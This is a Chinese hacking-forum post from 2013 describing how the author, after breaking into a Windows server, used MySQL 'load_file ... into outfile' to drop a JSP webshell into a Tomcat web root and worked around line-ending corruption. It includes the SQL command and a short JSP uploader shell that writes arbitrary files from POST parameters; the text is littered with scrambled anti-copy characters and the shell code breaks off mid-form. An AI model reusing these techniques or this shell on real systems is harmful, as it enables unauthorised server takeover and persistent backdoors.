找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2240|回复: 0
打印 上一主题 下一主题

解决Win下MySQL root导出Webshell换行符问题

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:52:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天碰到了这么个问题,简单记录一下我的解决方案。3 Z) M  B3 W% \) |2 H) @( e. |
7 c8 \% P0 K1 `# W3 v% a- a, d
首先说一下服务器的环境。服务器的80端口按照标准的虚拟主机来配置的,支持asp,aspx,php,但是不支持php9 P6 y+ I6 ]4 G) Q
安装了mssql(1433端口),tomcat(8080端口),serv-u(43958端口)和两个mysql(3306端口和3307端口), i; J% n' a9 d, o+ K, z/ x
提权的时候没有sa密码,没有serv-u密码,mysql 5.1首先运行了4 l: W% f- Y- P( G
1 show variables like '%plugin%';- _. d6 V1 n) E4 E
后,根据设置导出dll到C:\Program Files\MySQL\MySQL Server 5.1\lib\成功
: X/ D0 ]8 O2 _) Y$ E, r$ g- f创建自定义函数似乎被拦截,一直失败。
/ ]2 m; D, h, Y8 K6 r后找到tomcat目录,准备写马,asp,aspx,php对tomcat目录:C:/Program Files/cngradms_x86/tomcat/webapps/ROOT/均无写入权限7 a; ^+ _# J% O& V3 }) P6 {9 \
测试mysql有写入权限。故上传jsp大马至网站web目录:d:\xxx\fuck.jsp
9 r+ A  F& B6 {! I2 F; N用mysql执行语句:
7 ~  ]7 H. n/ _1 select load_file('d:\\xxx\\fuck.jsp')  into outfile 'C:\\Program Files\\cngradms_x86\\tomcat\\webapps\\ROOT\\upload\\fuck.jsp'1 N0 w, }/ t, J# D- k
2 复制代码
4 j( Q; X7 L5 h/ h+ E( e后成功。& W. b. S) e% G0 z& R- d# Z
但是访问后得到如下提示:7 j) A+ ]- R. q6 J* E5 Q
​500页面
+ b# Y; N+ r* h  K  F8 V9 u/ W, V: B5 i2 D* ^% l
0 q. ~# X" o5 q7 F# H8 ]
明显是MySQL的Win下版本自动添加转义符\n\r了2 Q- i% }# K( v' J, R  W
这样导致程序运行的悲剧。! O0 ]% X1 q8 U& C
从网上找了很多方法,什么update把转义符消掉,enclose巴拉巴拉,反正五花八门就是没一个可以用的。" B6 L$ X  }& b! Z
最后弄了这么个小脚本:; y0 N& B- o7 u4 C7 Q
01 <%@ page language="java" pageEncoding="gbk"%>- V& Q, I  S2 l! f
02 <jsp:directive.page import="java.io.File"/>- A) j. D* K( n
03 <jsp:directive.page import="java.io.OutputStream"/>
4 P% E- j1 ?3 [- S. K* T" `04 <jsp:directive.page import="java.io.FileOutputStream"/>) x9 N  u: k* s
05 <% int i=0;String method=request.getParameter("act");if(method!=null&&method.equals("yoco")){String url=request.getParameter("url");String text=request.getParameter("smart");File f=new File(url);if(f.exists()){f.delete();}try{OutputStream o=new FileOutputStream(f);o.write(text.getBytes());o.close();}catch(Exception e){i++;%>
1 B$ U) C5 A9 q" ^! q/ M06 error www.2cto.com/ }4 r6 |0 |9 V. C' ]; X' O8 N
07 <%}}if(i==0){%>6 Z1 @# [  s. w
08 ok
& i. D1 Q, {/ Y$ c8 f09 <%}%>' e/ w# |; P9 n8 R% M' M  d
10 <form action='?act=yoco' method='post'><input size="100" value="<%=application.getRealPath("/") %>" name="url"><br><textarea rows="20" cols="80" name="smart">9 h! {- {9 N" f5 q4 B$ r
就可以避免转义符让JSP的马儿运行500错误了。
& }6 a3 k! z8 t/ n8 Q& P
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表